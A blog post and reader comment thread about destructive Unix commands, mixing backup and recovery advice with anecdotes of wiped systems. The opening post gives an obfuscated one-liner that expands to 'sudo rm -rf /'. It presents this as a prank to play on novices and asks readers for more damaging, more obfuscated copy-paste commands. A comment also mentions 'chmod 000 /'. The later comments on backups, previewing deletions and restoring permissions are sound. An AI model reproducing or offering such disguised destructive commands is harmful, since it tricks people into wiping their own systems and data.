Here is my favorite bash script which can be used to teach noobs about bash syntax, man pages and the importance of backup at the same time:
s="r"; d="$s"m; f="$s"f; sudo $($d -$f /)
If not on Ubuntu, just get rid of sudo and tell people to run it as root. Oh, and if you copied and pasted this into your terminal to try what it does, I hope you backed up recently. I’m guessing it probably won’t delete everything (there would be some access violations and stuff) but it will probably do enough damage for you to hate me for the rest of your life.
Oh, and it won’t work on Solaris 10. I guess someone at Sun fell for some incarnation of this very trick at some point. :P
Btw, has anyone ever killed a system this way? What is the most damage you ever did to a linux system by issuing a reckless command as root?
Also, can you beat my denoobization script? Time to show your true BOFH skills. Points will be given for the magnitude of damage it causes, obfuscation and brevity. Btw, you should be able to copy and paste it into the terminal as a single line.
[tags]linux, rm, rm -rf, bofh, noob, unix[/tags]
This guy did it on a vm and made a video. I did something similar once – there is a big difference between “rm -r /” and “rm -r ./” – whoops. Luckily it was on my server and I have a dd & gzip script cronned that makes sure I always have a full OS backup (it is only like 1gb, since the server is gui-less and about as stripped down as can be safely done). I booted into failsafe mode, replaced hda1 with the dd file, and was on my way.
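For anyone curious, a cron-able dd-and-gzip image backup like the one described can be as simple as the sketch below. On the real server DEVICE would be something like /dev/hda1; here it defaults to a scratch file so the demo is safe to run anywhere, and all paths are assumptions.

```shell
#!/bin/sh
# Sketch of a nightly full-image backup: raw-copy the partition, compress it.
# DEVICE/DEST defaults are demo stand-ins, not the real server's paths.
DEVICE="${DEVICE:-/tmp/fake-disk.img}"
DEST="${DEST:-/tmp/os-image.dd.gz}"

# Create a stand-in "disk" only for the demo; a real partition needs no setup.
[ -e "$DEVICE" ] || dd if=/dev/zero of="$DEVICE" bs=1M count=4 2>/dev/null

# conv=sync,noerror keeps dd going past read errors instead of aborting.
dd if="$DEVICE" bs=4M conv=sync,noerror 2>/dev/null | gzip -c > "$DEST"
```

Restoring is the same pipe in reverse from a rescue/failsafe environment, along the lines of `gzip -dc os-image.dd.gz | dd of=/dev/hda1`.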
This is why I generally avoid running rm as root, and when I do I make sure I use the absolute path and avoid shortcuts and wild cards that could expand to something funky.
Sometimes I think rm should have a test option, i.e. rm -t would simply simulate the verbose output, but it would not actually delete anything.
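As far as I know GNU rm has no such dry-run flag, but you can fake one; a sketch (directory and file names invented for the demo):

```shell
mkdir -p /tmp/rm-test && cd /tmp/rm-test
touch a.o b.o notes.txt

# "Dry run" 1: echo the command so the shell shows you the expanded glob
echo rm -rf *.o

# "Dry run" 2: let find print what WOULD be deleted...
find . -name '*.o' -print

# ...and only add -delete once the printed list looks right:
find . -name '*.o' -delete
```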
I have never been able to destroy a system as a regular user with rm -rf /. I have done some moderate damage in Solaris with a user in GID 14 (sysadm).
Just about every “seasoned” sysadmin has accidentally typed something to result in rm -rf as root in a bad area. This is a great lesson, as it teaches many sysadmin principles:
1) Alter your command to make sure it is going to do what you think it will
When I use wildcards to do a mass removal, I always use ls with that command first. Then I use command history and change ls to rm. This way I know what is happening.
2) Learn how to restore from tape
Restoring a large amount of data from tape is not done often. This “little” exercise will quickly train an admin to document the process, precisely because it is needed so rarely.
3) Test your backups
We never appreciate backups until we need them. I have always said that the most important part of backups is the restore.
4) Know your users and how to communicate with them.
The system will be down for a lengthy period of time while all the data is restored. You can bet the phone and/or pager will be ringing/beeping for a while.
5) Have a disaster recovery plan
If there is a guide, you won’t have to live in man pages or drag other employees into your problem.
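Principle 1 in practice looks like this (file names invented for the demo): preview the glob with ls, then reuse the identical glob with rm.

```shell
mkdir -p /tmp/glob-demo && cd /tmp/glob-demo
touch app-1.log app-2.log keep.txt

ls app-*.log    # step 1: see exactly what the wildcard expands to
rm app-*.log    # step 2: recall the line from history and swap ls for rm
ls              # keep.txt is untouched
```

In bash the swap itself can be done with the quick-substitution shorthand `^ls^rm`, which re-runs the previous command with ls replaced by rm, so the glob is guaranteed to be the one you just previewed.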
I can’t agree more with #3. It’s especially important when you are backing up a system with a failing hard drive. I learned the hard way that ntbackup doesn’t like bad sectors on the disk, and will simply quit without warning if it doesn’t feel happy.
I was backing up two drives at the same time. One drive was fine, and it would be backed up normally. The other one would start backing up and then quit after the first 20 GB or so. Since the result was a single .bkf file, usually a few hundred GB in size, I didn’t notice this until that drive died and I needed to restore it from backup.
Since ntbackup would just quit, the whole archive for that drive was corrupted and inaccessible. The backup of the second drive (one that didn’t die) was just fine. :(
A few years ago, I entered the command “chmod 000 /” while I was learning Linux on a Fedora 4 system. I had to upgrade the entire OS to fix it.
Wait… You should still be able to chmod files back to normal as root, no? Then again, setting the right permissions for the right files might be a pain in the ass.
[quote post=”2091″]Wait… You should still be able to chmod files back to normal as root, no? Then again, setting the right permissions for the right files might be a pain in the ass.[/quote]
Theoretically, yes. The perms should be in the RPM database, but getting access to all the binaries and libs needed would be a pain.
I accidentally did this on Solaris in /opt once. Fortunately, I didn’t require any file access in this directory to restore the perms. It took a long time to get all the perm information out of the package database, but I was successful in restoring it back to normal.
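If the box is RPM-based, I believe `rpm --setperms -a` (and `rpm --setugids -a` for ownership) will replay the modes recorded in the package database, which automates exactly this recovery. For files the database doesn’t know about, a snapshot taken before risky work is cheap insurance; a sketch using GNU stat (paths invented, and the simple read loop assumes no newlines in file names):

```shell
mkdir -p /tmp/perm-demo/sub && cd /tmp/perm-demo
touch sub/app.conf && chmod 640 sub/app.conf

# Snapshot: record "octal-mode path" for everything under the tree
find . -exec stat -c '%a %n' {} \; > /tmp/perms.txt

chmod 000 sub/app.conf sub    # the "oops" moment

# Restore: replay the recorded modes (directories come first in find's
# preorder output, so they are searchable again before their contents)
while read -r mode path; do chmod "$mode" "$path"; done < /tmp/perms.txt
```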
Btw, what does solaris put in /opt? On my Ubuntu box I currently just have bunch of packages that were either compiled from source, or came as generic binaries not from a repository. Here is what I have there right now:
Bit Defender
Eclipse
Firefox
GCalDaemon
Google Desktop
Komodo Edit
In other words, my /opt is for shit that is not natively installed via apt and that likes to have its own program directory, Windows style. And I actually like it this way. It keeps things clean. :)
/opt is “optional” software in UNIX. Solaris uses this dir to install SUN branded software that does not come packaged with Solaris. Examples include SunStudio, SunRay Server software. Some other groups use this area as well, like BlastWave (/opt/csw).
I think of it as /usr/local, but for commercial software. Anything I compile from source goes into /usr/local. Makes it much easier when building or upgrading systems.
Oh, good tip. Next time I’m compiling something I’ll probably stick it in /usr/local which is mostly empty for me.
Actually, most of the things I compiled from source were nice enough to let me fakeroot them and turn them into deb packages, which can then be maintained by apt. As long as apt knows where they live, I don’t have to worry about them. :)
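For the curious, the deb such a build spits out is not magic; a minimal one can be rolled by hand with dpkg-deb. Everything below (package name, paths, contents) is made up for the demo:

```shell
mkdir -p /tmp/myapp/DEBIAN /tmp/myapp/opt/myapp
cd /tmp

# The DEBIAN/control file is the only mandatory metadata
cat > myapp/DEBIAN/control <<'EOF'
Package: myapp
Version: 1.0
Architecture: all
Maintainer: Nobody <nobody@example.com>
Description: demo package that lives in /opt
EOF

echo "hello" > myapp/opt/myapp/README
dpkg-deb --build myapp myapp_1.0_all.deb
# install with: sudo dpkg -i myapp_1.0_all.deb
# and because dpkg now tracks it, remove cleanly with: sudo dpkg -r myapp
```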
Oh wow! I got 7000 GET (look at the number on my comment – round 7000)! Wohoo!
Then again my comment is not very spectacular or meme worthy. Wasted get? :(
— GNU coreutils documentation
It seems that Sun took the “may become the default behavior” bit to heart since this is exactly what their version of rm does by default in Solaris 10. :)
Can anyone come up with a legitimate reason to do rm -rf /? I can’t think of a single instance when this would be useful. I mean from purely Unix point of view, if it’s syntactically legal, you should be able to do this. But when would you actually “need” it?
Yeah, never run that command as root. Luckily, when I made the above-mentioned mistake I wasn’t running as root. Unluckily, it hosed my /home/* directory so badly before I could stop it that it was worth restoring from backup.
One time we had a box where users were allowed to create new files in any folder they wanted on the system, but were not given write privileges to any existing files (all the users were employees: trustworthy and all very capable; I was the only newb).
One guy left the group, and he had been big into adding his own stuff to the box, which was fine. But now he’d left and his crap was all over outside of /home/thisguy and we wanted to clean up after him. We knew the system ran fine without the stuff the guy added, so our sysadmin decided to just run rm -rf / as this user. It worked nicely, cleaned up all the stuff the user had created, left everything else intact.
Not being a *nix user, I spent a while looking at the command at the top trying to figure out how it would hose everything.
It just clicked – the end bit refers to the beginning, replaces letters with other letters and comes up with rm -rf /.
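For anyone else staring at it: you can decode one-liners like that safely by swapping the execution for an echo, so the substitutions happen but nothing runs.

```shell
# Same variable assignments as the one-liner at the top, but echoed, not executed
s="r"; d="$s"m; f="$s"f
echo "$d -$f /"    # prints: rm -rf /
```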
Which I know from teh interwebs is normally not a good thing to do… :)